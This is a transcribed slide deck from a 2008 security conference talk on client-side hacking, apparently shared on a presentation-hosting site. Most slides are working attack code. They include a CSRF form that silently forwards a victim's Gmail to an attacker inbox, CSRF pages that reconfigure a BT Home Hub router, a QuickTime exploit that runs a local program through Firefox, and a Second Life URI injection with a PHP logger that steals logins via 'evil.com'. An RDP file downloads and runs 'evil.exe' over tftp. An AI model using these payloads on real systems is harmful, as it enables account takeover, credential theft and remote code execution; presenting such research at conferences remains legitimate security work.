confidence 2008 krakow
play

CONFIDENCE 2008 KRAKOW pdp information security researcher, - PowerPoint PPT Presentation

Aug 24, 2022 •283 likes •929 views

CONFIDENCE 2008 KRAKOW pdp information security researcher, hacker, founder of GNUCITIZEN Cutting-edge Think Tank ABOUT GNUCITIZEN Think tank Research Training Consultancy Ethical Hacker Outfit Responsible disclosure

  2. CONFIDENCE 2008 KRAKOW

  3. pdp information security researcher, hacker, founder of GNUCITIZEN

  4. Cutting-edge Think Tank

  6. ABOUT GNUCITIZEN  Think tank  Research  Training  Consultancy  Ethical Hacker Outfit  Responsible disclosure  We have nothing to hide  Tiger Team  The only active Tiger Team in UK.  Proud to have some of the best pros in our team.

  7. OTHERS  Hakiri  Hacker Lifestyle  Spin Hunters  Social Hacking Research House  House of Hackers  Hacker Social Network

  8. CLIENT-SIDE SECURITY Overview of various Client-Side Hacking Tricks and Techniques

  9. OBJECTIVES  I was planning to...  Research Design Issues.  Innovate.  Mix & Match Ideas.  I am not a bug hunter, therefore...  Concentrate on the practicalities.  Look for things I could use in my work.  Have fun.

  10. CLIENTS & SERVERS  Symbiosis  Clients & Servers are in a constant interaction.  This interaction comes in various forms.  Their security model is shared.

  11. THE GMAIL HIJACK TECHNIQUE

  12. THE GMAIL HIJACK TECHNIQUE

  13. THE GMAIL HIJACK TECHNIQUE

  14. THE GMAIL HIJACK TECHNIQUE  Via a CSRF Redirection Utility http://www.gnucitizen.org/util/csrf  ?_method=POST&_enctype=multipart/form-data &_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf &cf2_emc=true &cf2_email=evilinbox@mailinator.com &cf1_from &cf1_to &cf1_subj &cf1_has &cf1_hasnot &cf1_attach=true &tfi&s=z &irf=on&nvp_bu_cftb=Create%20Filter

  15. THE GMAIL HIJACK TECHNIQUE  HTML Code <html>  <body> <form name="form" method="POST" enctype="multipart/form-data" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf"> <input type="hidden" name="cf2_emc" value="true"/> <input type="hidden" name="cf2_email" value="evilinbox@mailinator.com"/> <input type="hidden" name="cf1_from" value=""/> <input type="hidden" name="cf1_to" value=""/> <input type="hidden" name="cf1_subj" value=""/> <input type="hidden" name="cf1_has" value=""/><input type="hidden" name="cf1_hasnot" value=""/> <input type="hidden" name="cf1_attach" value="true"/> <input type="hidden" name="tfi" value=""/> <input type="hidden" name="s" value="z"/> <input type="hidden" name="irf" value="on"/> <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> </form> <script>form.submit()</script> </body> </html>

  16. SOMEONE GOT HACKED It is unfortunate, but it gives us a good case study!

  17. PWNING BT HOME HUB  Enable Remote Assistance <html>  <!-- ras.html --> <head></head> <body> <form name='raccess' action='http://192.168.1.254/cgi/b/ras//? ce=1&be=1&l0=5&l1=5' method='post'> <input type='hidden' name='0' value='31'> <input type='hidden' name='1' value=''> <input type='hidden' name='30' value='12345678'> <!-- <input type='submit' value="own it!"> --> </form> <script>document.raccess.submit();</script> </body> </html>

  18. PWNING BT HOME HUB  Disable Wireless Connectivity <html>  <body> <!-- disable_wifi_interface.html --> <!-- POST /cgi/b/_wli_/cfg/?ce=1&be=1&l0=4&l1=0&name= HTTP/1.1 0=10&1=&32=&33=&34=2&35=1&45=11&47=1 --> <form action="http://192.168.1.254/cgi/b/_wli_/cfg//" method="post"> <input type="hidden" name="0" value="10"> <input type="hidden" name="1" value=""> <input type="hidden" name="32" value=""> <input type="hidden" name="33" value=""> <input type="hidden" name="34" value="2"> <input type="hidden" name="35" value="1"> <input type="hidden" name="45" value="11"> <input type="hidden" name="47" value="1"> </form> <script>document.forms[0].submit();</script> </body> </html>

  19. PWNING BT HOME HUB  Call Jacking POST http://api.home/cgi/b/_voip_/stats//?  ce=1&be=0&l0=-1&l1=-1&name= 0=30&1= 00390669893461  Is that the Vatican number?

  20. PWNED!!! Thanks to AP!!!

  21. PWNED!!! SNOM .mario hacked Snom

  22. CROSS-SITE FILE UPLOAD ATTACKS  The Flash Method <mx:Application xmlns:mx="http://www.adobe.com/2006/mxml"  creationComplete="onAppInit()"> <mx:Script> /* by Petko D. Petkov; pdp * GNUCITIZEN **/ import flash.net.*; private function onAppInit():void { var r:URLRequest = new URLRequest('http://victim.com/upload.php'); r.method = 'POST'; r.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22gc.txt%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0AHi from GNUCITIZEN%21%0D %0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form- data%3B name%3D%22submit%22%0D%0A%0D%0ASubmit Query%0D %0A-----------------------------109092118919201--%0A'); r.contentType = 'multipart/form-data; boundary=---------------------------109092118919201'; navigateToURL(r, '_self'); } </mx:Script> </mx:Application>

  23. CROSS-SITE FILE UPLOAD ATTACKS  The FORM Method <form method="post" action="http://kuza55.awardspace.com/files.php"  enctype="multipart/form-data"> <textarea name='file"; filename="filename.ext Content-Type: text/plain; '>Arbitrary File Contents</textarea> <input type="submit" value='Send "File"' /> </form>  by kuza55  Opera doesn't like it!

  24. QUICKTIME PWNS FIREFOX  QuickTime Media Links <?xml version="1.0">  <?quicktime type="application/x-quicktime-media-link"?> <embed src="Sample.mov" autoplay="true"/>  Supported File Extensions 3g2, 3gp, 3gp2, 3gpp, AMR, aac, adts, aif, aifc, aiff, amc, au,  avi, bwf, caf, cdda, cel, flc, fli, gsm, m15, m1a, m1s, m1v, m2a, m4a, m4b, m4p, m4v, m75, mac, mov, mp2, mp3, mp4, mpa, mpeg, mpg, mpm, mpv, mqv, pct, pic, pict, png, pnt, pntg, qcp, qt, qti, qt

  25. QUICKTIME PWNS FIREFOX  The Exploit <?xml version="1.0">  <?quicktime type="application/x-quicktime-media-link"?> <embed src="a.mp3" autoplay="true" qtnext=" -chrome javascript:file=Components.classes['@mozilla.org/file/local; 1'].createInstance(Components.interfaces.nsILocalFile);file.initWit hPath('c:\\windows\\system32\\calc.exe');process=Components.classes ['@mozilla.org/process/util; 1'].createInstance(Components.interfaces.nsIProcess);process.init(f ile);process.run(true,[],0);void(0); "/>

  26. QUICKTIME PWNS FIREFOX  The Exploit  qtnext=" -chrome javascript:...

  27. IE PWNS SECOND LIFE  The Exploit  <iframe src=' secondlife://" -autologin -loginuri "http://evil.com/sl/record- login.php' ></iframe>

  28. IE PWNS SECOND LIFE  Avatar Theft [HTTP_RAW_POST_DATA] => <methodCall>  <methodName>login_to_simulator</methodName> … … … <member> <name>passwd</name> <value> <string>$1$ [MD5 Hash of the password here] </string> </value> </member> … … … </methodCall>

  29. IE PWNS SECOND LIFE  …with that  <?php ob_start(); print_r($GLOBALS); error_log(ob_get_contents(), 0); ob_end_clean(); ?>

  30. ALL YOUR AVATARS ARE BELONG TO US!!!

  31. CITRIX/RDP COMMAND FIXATION ATTACKS  CITRIX ICA [WFClient]  Version=1 [ApplicationServers] Connection To Citrix Server= [Connection To Citrix Server] InitialProgram= some command here Address= 172.16.3.191 ScreenPercent=0  Microsoft RDP screen mode id:i:1  desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: some command here shell working directory:s:C:\ bitmapcachepersistenable:i:1

  32. CITRIX/RDP COMMAND FIXATION ATTACKS  The Malicious One  screen mode id:i:1 desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: cmd.exe /C “tftp -i evil.com GET evil.exe evil.exe & evil.exe” shell working directory:s:C:\ bitmapcachepersistenable:i:1

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

THE LISTING PRESENTATION A Natural Close! CONFIDENCE CONFIDENCE CONFIDENCE CONFIDENCE Hi

THE LISTING PRESENTATION A Natural Close! CONFIDENCE CONFIDENCE CONFIDENCE CONFIDENCE Hi

THE LISTING PRESENTATION A Natural Close! CONFIDENCE CONFIDENCE CONFIDENCE CONFIDENCE Hi (name??) Im Kerri! We had an appointment at ____ and its _____ time (so, Im actually ahead of the game)! &lt;&lt;pause&gt;&gt; Thank

50 views • 4 slides
CS70: Jean Walrand: Lecture 29. Confidence? Confidence? Confidence is essential is many

CS70: Jean Walrand: Lecture 29. Confidence? Confidence? Confidence is essential is many

CS70: Jean Walrand: Lecture 29. Confidence? Confidence? Confidence is essential is many applications: You flip a coin once and get H . How effective is a medication? Do think that Pr [ H ] = 1? Confidence Intervals Are we sure of the

301 views • 3 slides
K. M. ABRAHAM SEBI Confidence through collaboration Crisis of confidence Fear

K. M. ABRAHAM SEBI Confidence through collaboration Crisis of confidence Fear

Enhancing Regional Financial Cooperation in South Asia A Regulators Perspective K. M. ABRAHAM SEBI Confidence through collaboration Crisis of confidence Fear uncertainty Looking for scapegoats Confidence building

247 views • 22 slides
POLAND 3.4.2019 POLAND COUNTRY OUTLOOK Krakow belongs to the worlds top best global

POLAND 3.4.2019 POLAND COUNTRY OUTLOOK Krakow belongs to the worlds top best global

POLAND 3.4.2019 POLAND COUNTRY OUTLOOK Krakow belongs to the worlds top best global outsourcing cities in 2017 Basic Facts Biggest cities Area: 312, 678 sq.km Warsaw 1.75 Mio Population 38 million Krakow 0.76 Mio Capital:

676 views • 25 slides
Demonstration of Methodology 1. Determine Confidence of Hydrographic Holdings. Measuring

Demonstration of Methodology 1. Determine Confidence of Hydrographic Holdings. Measuring

Demonstration of Methodology 1. Determine Confidence of Hydrographic Holdings. Measuring Equipment Used High Confidence Age of Data Med. Confidence Surveying Low Confidence Technique Unassessed Other CAN and USA used Electronic

194 views • 6 slides
Lecture 25/Chapter 21 Estimating Means with Confidence Example: Meaning of Confidence Interval

Lecture 25/Chapter 21 Estimating Means with Confidence Example: Meaning of Confidence Interval

Lecture 25/Chapter 21 Estimating Means with Confidence Example: Meaning of Confidence Interval Reviewing Conditions and Rules Constructing a Confidence Interval for a Mean Matched Pairs &amp; Two-Sample Studies Inference for

330 views • 28 slides
XYZ states at LHCb Marcin Kucharczyk on behalf of LHCb Collaboration IFJ PAN Krakow MESON 2018,

XYZ states at LHCb Marcin Kucharczyk on behalf of LHCb Collaboration IFJ PAN Krakow MESON 2018,

XYZ states at LHCb Marcin Kucharczyk on behalf of LHCb Collaboration IFJ PAN Krakow MESON 2018, Krakow 07.06 - 12.06 2018 Outline XYZ states Probing X(3872) composition quantum number confirmed 1 ++ [PRD 92 (2015) 011102] Enigmatic

489 views • 25 slides
Nuclear Industry Perspectives on Waste Confidence Briefing on Waste Confidence Rulemaking March

Nuclear Industry Perspectives on Waste Confidence Briefing on Waste Confidence Rulemaking March

Nuclear Industry Perspectives on Waste Confidence Briefing on Waste Confidence Rulemaking March 21, 2014 Ellen C. Ginsberg Vice President, General Counsel and Secretary Nuclear Energy Institute Background Waste Confidence Decision: - A

277 views • 11 slides
High Confidence Rule Mining h f d l Row Enumeration for Microarray Analysis Confidence

High Confidence Rule Mining h f d l Row Enumeration for Microarray Analysis Confidence

2007-11-26 Outline Introduction High Confidence Rule Mining h f d l Row Enumeration for Microarray Analysis Confidence based Prune Strategy MAXCONF Algorithm Kang Deng Evaluation U i University of Alberta it f Alb t

83 views • 7 slides
Dunk Island Work Experience work! We joined the rest of the staff in June 1 - 7, 2008 the

Dunk Island Work Experience work! We joined the rest of the staff in June 1 - 7, 2008 the

Issue 08, June 20, 2008 quickly gaining THOUGHT FOR THE DAY confidence with the There is no limit to what can be accomplished if it doesn't routines and the matter who gets the credit - Ralph Waldo Emerson guests. What a beautiful

995 views • 4 slides
Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT

Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT

Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT large sample confidence intervals for the mean. Three views of confidence intervals. Constructing a confidence interval without normality: the

478 views • 18 slides
Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT

Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT

Confidence Intervals II 18.05 Spring 2014 Agenda Polling: estimating in Bernoulli( ). CLT large sample confidence intervals for the mean. Three views of confidence intervals. Constructing a confidence interval without normality: the

644 views • 16 slides
Lecture 24/Chapter 20 Estimating Proportions with Confidence Example: Importance of Margin of

Lecture 24/Chapter 20 Estimating Proportions with Confidence Example: Importance of Margin of

Lecture 24/Chapter 20 Estimating Proportions with Confidence Example: Importance of Margin of Error From Probability to Confidence Constructing a Confidence Interval Examples Example: What Can We Infer About Population? Background :

723 views • 24 slides
Anxiety, confidence and risky decisions Effects of anxiety and confidence on decision-making in

Anxiety, confidence and risky decisions Effects of anxiety and confidence on decision-making in

Anxiety, confidence and risky decisions Effects of anxiety and confidence on decision-making in (non)competitive settings John Haleblian via Mark L oczy Gerry McNamara The A. Gary Anderson Graduate School of Management University of

515 views • 36 slides
Regenerating Confidence A NEW PATHWAY FORWARD FEBRUARY 2018 Regenerating Confidence | A New

Regenerating Confidence A NEW PATHWAY FORWARD FEBRUARY 2018 Regenerating Confidence | A New

Regenerating Confidence A NEW PATHWAY FORWARD FEBRUARY 2018 Regenerating Confidence | A New Pathway Forward A STREAMLINED STRUCTURE NEW! FINANCING AND MARKET EXPANSION: CHINESE SUBSIDIARY Reduced expense burn Prioritized programs

217 views • 7 slides
3 rd Facilitation Meeting for WSIS Action Line C5 Building confidence and security in the use

3 rd Facilitation Meeting for WSIS Action Line C5 Building confidence and security in the use

3 rd Facilitation Meeting for WSIS Action Line C5 Building confidence and security in the use of ICTs 22nd May 2008 GENEVA VOICE OVER IP (VoIP) Presented by Graham Butler President &amp; C.E.O Bitek International Inc www.bitek.com

191 views • 17 slides
Fort Benning, Home of the MCoE 1 Maneuver Center of Excellence - Team of Soldiers, Families, and

Fort Benning, Home of the MCoE 1 Maneuver Center of Excellence - Team of Soldiers, Families, and

Fort Benning, Home of the MCoE 1 Maneuver Center of Excellence - Team of Soldiers, Families, and Civilians from the Best Army in the World! Fort Benning, Home of the MCoE Dr. David Johnson Center for Strategic and Budgetary Assessments

393 views • 13 slides
The Grand Lodge of Kansas 2020 Vision 10-Year Strategic Plan March 19, 2010 Rick Reichert

The Grand Lodge of Kansas 2020 Vision 10-Year Strategic Plan March 19, 2010 Rick Reichert

The Grand Lodge of Kansas 2020 Vision 10-Year Strategic Plan March 19, 2010 Rick Reichert Grand Senior Deacon 2009-2010 Vision 2020 Highly respected and sought institution A recognized landmark in Topeka Growth to 30,000 members

373 views • 10 slides
From Eclipse to Jazz to Team Concert Developing Software like a band plays Jazz Erich Gamma Jazz

From Eclipse to Jazz to Team Concert Developing Software like a band plays Jazz Erich Gamma Jazz

From Eclipse to Jazz to Team Concert Developing Software like a band plays Jazz Erich Gamma Jazz Technical Lead IBM Distinguished Engineer IBM Rational Zurich Research Lab

657 views • 46 slides
Advanced Cyberinfrastructure Research and Education Facilitator

Advanced Cyberinfrastructure Research and Education Facilitator

Advanced Cyberinfrastructure Research and Education Facilitator (ACI-REF) Barr von Oehsen Execu0ve Director, Cyberinfrastructure Technology Integra0on, Clemson

232 views • 6 slides
The SuperTiger-1 instrument and its long-duration Antarctic balloon flight J.T. LINK 2,6 , W.R.

The SuperTiger-1 instrument and its long-duration Antarctic balloon flight J.T. LINK 2,6 , W.R.

The SuperTiger-1 instrument and its long-duration Antarctic balloon flight J.T. LINK 2,6 , W.R. BINNS 1 , R.G. BOSE 1 , D.L. BRAUN 1 , T.J. BRANT 2 , W.M. DANIELS 2 , P.F. DOWKONTT 1 , S.P. FITZSIMMONS 2 , D.J. HAHNE 2 , T. HAMS 2,6 , M.H. ISRAEL 1

409 views • 15 slides
Introduction to GANs LSGAN SAGAN MIX+GAN Ian Goodfellow, Sta ff Research Scientist, Google Brain

Introduction to GANs LSGAN SAGAN MIX+GAN Ian Goodfellow, Sta ff Research Scientist, Google Brain

CoGAN ID-CGAN LR-GAN MedGAN CGAN IcGAN DiscoGAN LS-GAN b-GAN LAPGAN MPM-GAN AdaGAN AMGAN iGAN InfoGAN IAN CatGAN Introduction to GANs LSGAN SAGAN MIX+GAN Ian Goodfellow, Sta ff Research Scientist, Google Brain McGAN IEEE

873 views • 35 slides
The Initiative Discovering Talent, Developing Skills, Building Careers. CURRENT SITUATION

The Initiative Discovering Talent, Developing Skills, Building Careers. CURRENT SITUATION

The Initiative Discovering Talent, Developing Skills, Building Careers. CURRENT SITUATION Help Wanted Shortage of Skilled Workforce Right Now Nationally 428,000 + skilled jobs going unfilled Minnesota 12,000 + skilled jobs going

651 views • 54 slides
Riga, , Latvia, via, October 7 8, 2010 Current situation with Latvian &amp; Lithuanian MT

Riga, , Latvia, via, October 7 8, 2010 Current situation with Latvian &amp; Lithuanian MT

Raivis SKADI a,b a,b , Krlis GOBA a and Valters ICS a a Tilde SIA, Latvia ia b University sity of Latvia ia, Latvia ia The Fourth Internatio ional nal Confer eren ence ce HUMAN N LANGUA UAGE GE TECHNO NOLOGIE GIES THE

557 views • 17 slides

More recommend